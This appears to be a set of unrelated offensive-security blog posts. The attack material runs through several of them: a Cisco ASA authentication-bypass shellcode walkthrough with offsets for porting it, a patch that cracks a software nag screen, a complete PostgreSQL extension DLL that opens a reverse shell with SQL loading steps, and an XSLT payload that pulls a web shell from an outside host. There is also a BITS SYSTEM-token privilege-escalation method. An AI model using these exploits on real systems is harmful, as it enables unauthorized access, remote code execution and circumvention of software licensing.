    Note: this is for payload "pass-disable". There's a second payload, "pass-enable", which re-patches the bytes. So after you log in as admin, you can run a second exploit to clean up your tracks.

    For this stage, there is payload_PMCHECK_DISABLE_byte and payload_AAAADMINAUTH_DISABLE_byte. These two shellcodes perform the same overall function, just for different offsets, with a lot of code reuse.

    Here is the Equation Group PMCHECK_DISABLE shellcode:

    There's some shellcode trickery going on, but here are the steps being taken:

    1. First, the syscall to mprotect() marks a page of memory as read/write/exec, so we can patch the code
    2. Next, we jump forward to right before the end of the shellcode
      • The last 3 lines of the shellcode contain the code to "always return true"
    3. The call instruction puts the current address (where patch code is) on the stack
    4. The patch code address is pop'd into esi and we jump backwards
    5. rep movs copies 4 bytes (ecx) from esi (source index) to edi (destination index), then we jump to the admauth() patch

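    The following is functionally equivalent C code:


    /* sys_mprotect() stands in for the raw mprotect() syscall. */
    void *const PMCHECK_BOUNDS = (void *)0x954c000;         /* page to unprotect */
    uint32_t *const PMCHECK_OFFSET = (uint32_t *)0x954cfd0; /* address that gets patched */

    const uint32_t PMCHECK_BYTES = 0xc340c031;              /* 31 c0 40 c3 in memory */

    sys_mprotect(PMCHECK_BOUNDS, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC);
    *PMCHECK_OFFSET = PMCHECK_BYTES;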

    In this case, PMCHECK_BYTES will be "always return true".


    xor eax, eax ; set eax to 0 -- 31 c0
    inc eax ; increment eax -- 40
    ret ; return -- c3
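    The 32-bit constant and the four opcode bytes are the same thing viewed two ways, since x86 stores integers little-endian. A short Python check, offered only as an illustration:

```python
import struct

PATCH_CODE = bytes.fromhex("31c040c3")  # xor eax, eax / inc eax / ret

# Interpret the four opcode bytes as one little-endian 32-bit integer.
(patch_dword,) = struct.unpack("<I", PATCH_CODE)
print(hex(patch_dword))  # 0xc340c031
```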

    Yes, my friends who are fluent in shellcode, the assembly is extremely verbose just to write 4 bytes to a memory location. Here is how we summarized everything from loc_00000025 to the end in the improved shellcode:

    mov dword [PMCHECK_OFFSET], PMCHECK_BYTES

    In the inverse operation, pass-enable, we will simply patch the bytes to their original values.

    Finding Offsets

    So now that we've reverse engineered the shellcode, we know what offsets we need to patch to port the exploit to a new Cisco ASA version:

    1. The RET smash, which should be JMP ESP (ff e4) bytes
    2. The "safe" return address, to continue execution after our shellcode runs
    3. The address of pmcheck()
    4. The address of admauth()

    RET Smash

    We can set the RET smash address to anywhere JMP ESP (ff e4) opcodes appear in an executable section of the binary. There is no shortage of the actual instruction in 9.2(3).

    Any of these will do, so we just picked a random one.
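    A search like this does not need special tooling. The sketch below scans a byte string for every ff e4 pair; the sample buffer is a made-up stand-in for an executable section of lina, and `find_all` is a hypothetical helper. Against a real binary, the file offsets found would still need to be converted to virtual addresses and checked to lie in an executable section.

```python
def find_all(data, needle):
    """Yield every offset at which `needle` occurs in `data`."""
    pos = data.find(needle)
    while pos != -1:
        yield pos
        pos = data.find(needle, pos + 1)


JMP_ESP = b"\xff\xe4"

# Made-up bytes standing in for part of an executable section.
sample = b"\x90\x90\xff\xe4\xc3\x55\x89\xe5\xff\xe4"
print([hex(off) for off in find_all(sample, JMP_ESP)])  # ['0x2', '0x8']
```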

    Safe Return Address

    This is the location to safely return execution to after the shellcode runs. As mentioned, this part of the code isn't actually recognized as a function by IDA, and also the same trick we'll use for the Authentication Functions (searching the assembly with ROPgadget) doesn't work here.

    The offset in 8.4(3) is 0xad457e33 ^ 0xa5a5a5a5 = 0x8e0db96

    This location contains a distinctive signature of bytes that we can grep for in 9.2(3).

    Our safe return address offset is at 0x9277386.
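    The XOR arithmetic for the 8.4(3) offset above is easy to reproduce. Because XOR is its own inverse, one function both masks and unmasks; `unmask` is a hypothetical name used for illustration.

```python
MASK = 0xA5A5A5A5


def unmask(value):
    """XOR with the mask; applying it twice returns the original value."""
    return value ^ MASK


print(hex(unmask(0xAD457E33)))  # 0x8e0db96
print(hex(unmask(0x08E0DB96)))  # 0xad457e33
```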

    Authentication Functions

    Finding the offsets for pmcheck() and admauth() is pretty simple. The offsets in 8.4(3) are not XORed by 0xa5a5a5a5, but the page alignment for sys_mprotect() is.

    We'll dump the pmcheck() function from 8.4(3).

    We have the bytes of the function, so we can use the Python ROPGadget tool from Jonathan Salwan to search for those bytes in 9.2(3).

    It's a pretty straightforward process, which can be repeated for admauth() offsets. Note that during this process, we get the unpatch bytes needed for the pass-enable shellcode.

    Finding the page alignment boundaries for these offsets (for use in sys_mprotect()) is easy as well, just floor to the nearest 0x1000.
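    Flooring to a page boundary is a single bit mask. As a sketch, using the 0x954cfd0 address from the C snippet earlier as the input and assuming 4 KiB pages:

```python
PAGE_SIZE = 0x1000


def page_floor(addr):
    """Round an address down to the start of its 4 KiB page."""
    return addr & ~(PAGE_SIZE - 1)


print(hex(page_floor(0x954CFD0)))  # 0x954c000
```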

    Improving the Shellcode

    We were able to combine the Equation Group stages "preamble" and "payload" into a single stage by rewriting the shellcode. Here is a list of ways we shortened the exploit code:

    1. Removed all XOR 0xa5a5a5a5 operations, as null bytes are allowed
    2. Reused code for the two sys_mprotect() calls
    3. Used a single mov operation instead of jmp/call/pop/rep movs to patch the code
    4. General shellcode size optimization tricks (performing the same tasks with ops that use fewer bytes)

    The lackadaisical approach to the shellcode, as well as the Python code, came as a bit of a surprise, as the Equation Group is probably the most elite APT on the planet. There's a lot of cleverness in the code though, and whoever originally wrote it obviously had to be competent. To me, it appears the shellcode is kind of an off-the-shelf solution to solving generic problems, instead of being custom tailored for the exploit.

    By changing the shellcode, we gained one enormous benefit. We no longer have to find the stack offset that contains a pointer to the third stage. This step gave us so much trouble that we started experimenting with using an egg hunter. We know that the stack offset to the third stage was a bottleneck for SilentSignal as well (Bake Your Own EXTRABACON). But once we understood the overall operation of all stages, we were happy to just reduce the bytes and keep everything in the one stage. Not having to find the third stage offset makes porting the exploit very simple.

    Future Work

    The Equation Group appeared to have generated their shellcode. We have written a Python script that will auto-port the code to different versions. We find offsets using similar heuristics to what ROPGadget offers. Of course, you can't trust a tool 100% (in fact, some of the Equation Group shellcode crashes certain versions). So we are testing each version.

    We're also porting the Python code to Ruby, so the exploit will be part of Metasploit. Our Metasploit module will contain the new shellcode for all Shadow Broker versions, as well as offsets for numerous versions not part of the original release, so keep an eye out for it.

    Removing Sublime Text Nag Window

    I contemplated releasing this blog post earlier, and now that everyone has moved on from Sublime Text to Atom there's really no reason not to push it out. This is posted purely for educational purposes.

    Everyone who has used the free version of Sublime Text knows that when you go to save a file, it will randomly show a popup asking you to buy the software. This is known as a "nag window".



    The first time I saw it, I knew it had to be cracked. Just pop open the sublime_text.exe file in IDA Pro and search for the string.



    We find a match, and IDA tells us where it is cross referenced.



    We open the function that uses these .rdata bytes and see that it checks some globals, and performs a call to rand(). If any of the checks fail it will display the popup. The function itself is only about 20 lines of pretty basic assembly but we decompile it anyway because the screenshot is cooler that way.



    We open the hex view to see what the hex code for the start of the function looks like.



    Next we open sublime_text.exe in Hex Workshop and search for the hex string that matches the assembly.



    Finally, we patch the beginning of the function with the assembly opcode c3, which will cause the function to immediately return.



    After saving, there will be no more nag window. As an exercise to the reader, try to make Sublime think you have a registered copy.

    Windows DLL to Shell PostgreSQL Servers

    On Linux systems, you can include system() from the standard C library to easily shell a Postgres server. The mechanism for Windows is a bit more complicated.

    I have created a Postgres extension (Windows DLL) that you can load which contains a reverse shell. You will need file write permissions (i.e. postgres user). If the PostgreSQL port (5432) is open, try logging on as postgres with no password. The payload is in DllMain and will run even if the extension is not properly loaded. You can upgrade to meterpreter or other payloads from here.



    #define PG_REVSHELL_CALLHOME_SERVER "127.0.0.1"
    #define PG_REVSHELL_CALLHOME_PORT "4444"

    #include "postgres.h"
    #include <string.h>
    #include "fmgr.h"
    #include "utils/geo_decls.h"
    #include <winsock2.h>

    #pragma comment(lib,"ws2_32")

    #ifdef PG_MODULE_MAGIC
    PG_MODULE_MAGIC;
    #endif

    #pragma warning(push)
    #pragma warning(disable: 4996)
    #define _WINSOCK_DEPRECATED_NO_WARNINGS

    BOOL WINAPI DllMain(_In_ HINSTANCE hinstDLL,
    _In_ DWORD fdwReason,
    _In_ LPVOID lpvReserved)
    {
    WSADATA wsaData;
    SOCKET wsock;
    struct sockaddr_in server;
    char ip_addr[16];
    STARTUPINFOA startupinfo;
    PROCESS_INFORMATION processinfo;

    char *program = "cmd.exe";
    const char *ip = PG_REVSHELL_CALLHOME_SERVER;
    u_short port = atoi(PG_REVSHELL_CALLHOME_PORT);

    WSAStartup(MAKEWORD(2, 2), &wsaData);
    wsock = WSASocket(AF_INET, SOCK_STREAM,
    IPPROTO_TCP, NULL, 0, 0);

    struct hostent *host;
    host = gethostbyname(ip);
    strcpy_s(ip_addr, sizeof(ip_addr),
    inet_ntoa(*((struct in_addr *)host->h_addr)));

    server.sin_family = AF_INET;
    server.sin_port = htons(port);
    server.sin_addr.s_addr = inet_addr(ip_addr);

    WSAConnect(wsock, (SOCKADDR*)&server, sizeof(server),
    NULL, NULL, NULL, NULL);

    memset(&startupinfo, 0, sizeof(startupinfo));
    startupinfo.cb = sizeof(startupinfo);
    startupinfo.dwFlags = STARTF_USESTDHANDLES;
    startupinfo.hStdInput = startupinfo.hStdOutput =
    startupinfo.hStdError = (HANDLE)wsock;

    CreateProcessA(NULL, program, NULL, NULL, TRUE, 0,
    NULL, NULL, &startupinfo, &processinfo);

    return TRUE;
    }

    #pragma warning(pop) /* re-enable 4996 */

    /* Add a prototype marked PGDLLEXPORT */
    PGDLLEXPORT Datum dummy_function(PG_FUNCTION_ARGS);

    PG_FUNCTION_INFO_V1(dummy_function);

    Datum dummy_function(PG_FUNCTION_ARGS)
    {
    int32 arg = PG_GETARG_INT32(0);

    PG_RETURN_INT32(arg + 1);
    }



    Here is the convoluted process of exploitation:
    postgres=# CREATE TABLE hextable (hex bytea);
    postgres=# CREATE TABLE lodump (lo OID);


    $ echo "INSERT INTO hextable (hex) VALUES
    (decode('`xxd -p pg_revshell.dll | tr -d '\n'`', 'hex'));" > sql.txt
    $ psql -U postgres --host=localhost --file=sql.txt


    postgres=# INSERT INTO lodump SELECT hex FROM hextable;
    postgres=# SELECT * FROM lodump;
    lo
    -------
    16409
    (1 row)
    postgres=# SELECT lo_export(16409, 'C:\Program Files\PostgreSQL\9.5\Bin\pg_revshell.dll');
    postgres=# CREATE OR REPLACE FUNCTION dummy_function(int) RETURNS int AS
    'C:\Program Files\PostgreSQL\9.5\Bin\pg_revshell.dll', 'dummy_function' LANGUAGE C STRICT;

    XML Attack for C# Remote Code Execution

    For whatever reason, Microsoft decided XML needed to be Turing complete. They created an XSL schema which allows for C# code execution in order to fill in the value of an XML element.

    If an ASP.NET web application parses XML, it may be susceptible to this attack. If vulnerable, an attacker gains remote code execution on the web server. Crazy, right? Exploitation is similar to traditional XML External Entity (XXE) attacks. Gaining direct code execution with traditional XXE requires extremely rare edge cases where certain protocols are supported by the server. This is more straightforward: supply whatever C# you want to run.

    The payload in this example XML document downloads a web shell into the IIS web root. Of course, you can craft a more sophisticated payload, or perhaps just download and run some malware (such as msfvenom/meterpreter). In many cases of a successful exploitation, and depending on the application code, the application may echo out the final string "Exploit Success" in the HTTP response.

    <?xml version='1.0'?>
    <xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:msxsl="urn:schemas-microsoft-com:xslt"
    xmlns:user="http://mycompany.com/mynamespace">
    <msxsl:script language="C#" implements-prefix="user">
    <![CDATA[
    public string xml()
    {
    System.Net.WebClient webClient = new System.Net.WebClient();
    webClient.DownloadFile("https://x.x.x.x/shell.aspx",
    @"c:\inetpub\wwwroot\shell.aspx");

    return "Exploit Success";
    }
    ]]>
    </msxsl:script>
    <xsl:template match="/">
    <xsl:value-of select="user:xml()"/>
    </xsl:template>
    </xsl:stylesheet>

    Note: I've never gotten the "using" directive to work correctly, but have found that the fully qualified names of the classes (e.g. System.Net.WebClient) work fine.

    This is kind of a hidden gem; it was hard to find good information about it.

    Thanks to Martin Bajanik for finding this information: this attack is possible when XsltSettings.EnableScript is set to true, but it is false by default.

    LoadLibrary() and GetProcAddress() replacements for x86, x64, and ARM

    I was attempting to reduce the number of records in the Import Address Table of an executable, which of course meant replacements for LoadLibrary() and GetProcAddress() were needed. I couldn't find a version online that worked for x86, x64, and ARM, so I ended up writing one. Even being mostly familiar with the PE format and Windows internals in general, there were a few caveats that led to an annoying debug session (such as forward exports).

    Here is a working replacement for the two APIs. You can even define the PE header and PEB structs in your own header and lose the requirement for the default Windows headers. I also recommend a crypter for the strings you pass to these functions.

    https://github.com/zerosum0x0/LoadLibrary-GetProcAddress-Replacements/blob/master/load/main.c

    Note: This will internally rely on Kernel32.dll being loaded, and will calculate the real location of LoadLibrary() dynamically. New DLLs will be mapped in with the real API call; this code does not do manual mapping or calling of DllMain. I recommend using it to get the real addresses of LoadLibrary() and GetProcAddress() and then doing all calls through the real APIs.

    BITS Manipulation: Stealing SYSTEM Tokens as a Normal User

    The Background Intelligent Transfer Service (BITS) is a Windows system service that facilitates file transfers between clients and servers, and serves as a backbone component for Windows Update. The service comes pre-installed on all modern versions of Windows, and is available in versions as early as Windows 2000 with service pack updates. There are ways for a non-Administrator user to manipulate the service into providing an Identification Token with the LUID of 999 (0x3e7), or the NT AUTHORITY\SYSTEM (Local System) root-equivalent user.


    BITS Manipulation is a pre-stage to modern privilege escalation attacks.

    BITS Manipulation is not a full exploit per se, but rather a pre-stage to local (and possibly remote) privilege escalation with a crafted executable. Identification Tokens can only lead to arbitrary code execution in the presence of secondary Improper Access Control (CWE-284) vulnerabilities. Google's Project Zero has demonstrated a number of full exploits using the technique. There are currently no known plans for Microsoft to fix this. Details for performing it and why it works remain exceptionally scarce.

    Windows Tokens

    Every user-mode thread on Windows executes with a Token, which is used as its security identifier by the kernel in order to determine access rights during system calls. When a user starts a process, the Primary Token for that process becomes one which represents the access rights of that user. Individual threads within the process are allowed to change their security context from the Primary Token through the use of Impersonation Tokens, which come in different privilege levels and can allow code execution in the context of a different user.

    Impersonation tokens are used throughout Windows in order to delegate responsibilities between users and the OS default users such as Local System, Local Service, and Network Service. For instance, a server process running as Network Service can impersonate a client user and perform actions on that user's behalf. It is extremely common and not suspicious behavior for a process to have multiple tokens open at any given time.

    Token Impersonation Levels

    A normal user obtaining an Identification Token as Local System is not necessarily an exploit in and of itself (some would argue otherwise, but at least not in the eyes of Microsoft). To understand why, a review of Token Impersonation Levels is required.

    BITS Manipulation and similar techniques only provide a SecurityIdentification Token for SYSTEM. This is useful for a number of tasks, but it still does not allow arbitrary code execution in the context of that user. Ordinarily, in order to achieve code execution as SYSTEM, the Token would need to be an Impersonation Token at the SecurityImpersonation or SecurityDelegation level.

    Identification-Only Exploitation

    There are a number of vulnerabilities in Windows where the Impersonation Level is not properly validated, such as in MS15-001, MS15-015, and MS15-050. These vulnerabilities failed to check if the Token Impersonation Level was sufficiently privileged before allowing arbitrary code execution in the context of the user.

    Here is a (simplified) reverse engineering of services.exe prior to the MS15-050 patch:


    Before MS15-050 Patch: The calling thread's Token is checked only for whether it runs as SYSTEM (LUID 999).

    With the background information above, the bug is easy to spot. Here is the same code after the patch:


    After MS15-050 Patch: The Impersonation Level is now correctly verified before the SYSTEM check.
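
    The difference between the two checks can be modeled in a few lines. This is a hedged sketch of the logic described in the captions above, not the decompiled services.exe code: the struct and function names are hypothetical, and the enum only mirrors the ordering of the Windows SECURITY_IMPERSONATION_LEVEL values so that it compiles without the Windows headers.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Same ordering as SECURITY_IMPERSONATION_LEVEL (Anonymous = 0 ... Delegation = 3). */
typedef enum {
    LEVEL_ANONYMOUS,
    LEVEL_IDENTIFICATION,
    LEVEL_IMPERSONATION,
    LEVEL_DELEGATION
} impersonation_level;

/* Hypothetical stand-in for the two token properties the check looks at. */
typedef struct {
    uint32_t auth_id_low;       /* low part of the logon session LUID */
    impersonation_level level;  /* impersonation level of the thread token */
} token_model;

#define SYSTEM_LUID_LOW 0x3e7u  /* 999, Local System */

/* Pre-patch model: only the LUID is compared, the level is ignored. */
bool is_system_prepatch(const token_model *t)
{
    assert(t != NULL);
    return t->auth_id_low == SYSTEM_LUID_LOW;
}

/* Post-patch model: the level is verified before the SYSTEM comparison. */
bool is_system_postpatch(const token_model *t)
{
    assert(t != NULL);
    if (t->level < LEVEL_IMPERSONATION)
        return false;           /* identification-only tokens are rejected */
    return t->auth_id_low == SYSTEM_LUID_LOW;
}
```

    In this model, a token with the SYSTEM LUID at LEVEL_IDENTIFICATION passes is_system_prepatch() but fails is_system_postpatch(), which is exactly the gap an identification-only token exploits.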

    It should now be apparent why a normal user attempting to escalate privileges would want a SYSTEM Token, even if it is only at the SecurityIdentification level. Countless token access control vulnerabilities have already been discovered, and more are likely to be found.

    BITS Manipulation Methodology

    BITS, by default, is an automatically started Windows service which logs on as Local System. While the service is primarily used for uploading and downloading files between machines, it is also possible to create a BITS server which services the local machine context. When a download is queued, the BITS service connects to the server as the SYSTEM user.


    Forcing a BITS download to an attacker-controlled BITS server allows capture of a SYSTEM token.

    Here is the general methodology, which can be performed as a non-Administrator user on the machine:

    1. Create a BITS server with a local context.
    2. Launch a BITS download job, causing SYSTEM to start a client to the local BITS server.
    3. Capture SYSTEM's token when it interacts with the server.

    BITS Manipulation Implementation

    BITS is served on top of Microsoft's Component Object Model (COM). COM is a topic of extensive study, but it is essentially a language-neutral, object-oriented binary interface that is arguably a precursor to .NET. Remnants of COM objects are found in various areas throughout the system, including inter-process (and inter-network) communications with network and local services. BITS Manipulation is fairly straightforward to implement for a software engineer who is familiar with the aforementioned methodology and the BITS documentation, and who has experience using COM.

    An existing implementation is available in Metasploit under exploit/windows/local/ntapphelpcachecontrol (MS15-001). The C++ source code offers a simple drop-in implementation for future proof-of-concepts. It is uncredited, but was likely written by James Forshaw of Google's Project Zero.

    Setting Up a Remote Desktop Behind Firewall

    Scenario: You are at a client site, and want to be able to securely check on pentest scans from your hotel room.

    This setup involves three computers and takes about 5 minutes:
    1. The laptop on the client network (the VNC server)
    2. The laptop you want to connect to the remote desktop with (the VNC client)
    3. A flagpole server (Internet-facing SSH server)

    Localhost port forwards managed by the Flagpole server set up a secure tunnel between the machines.


    No new ports will be externally exposed on any of the machines, and all network traffic will be encrypted through SSH. This method is preferable to other remote desktop solutions such as TeamViewer, where essentially the Flagpole server is controlled by a third party. For extra security, you can run your Flagpole SSH daemon on a high port and enforce certificate-based authentication.

    This guide is for Linux, but the general methodology is probably possible on Windows using TigerVNC and PuTTY.

    Step 1: Bind VNC Server to the Flagpole

    On the VNC server machine (scanner laptop), issue the following commands:
    tmux new
    x11vnc -localhost [-forever]
    <ctrl+b, c>
    ssh -R XXXXX:localhost:5900 [email protected]

    Replace XXXXX with an unused port on Flagpole. Note that it is also possible to set a password for the x11vnc server. x11vnc defaults to port 5900, but this can be changed with e.g. x11vnc -rfbport ###. The port you assigned on Flagpole now forwards to this port.

    Step 2: Bind Flagpole to VNC Client

    On the VNC client (from your hotel room), issue the following commands:

    tmux new
    ssh -L 5900:localhost:XXXXX [email protected]

    Where XXXXX is the port you bound on Flagpole. This forwards port 5900 on your local machine to the port you assigned on Flagpole.

    Step 3: Connect VNC Client to VNC Server

    Now, open your VNC software (vinagre/vncviewer/etc.) and connect to localhost:5900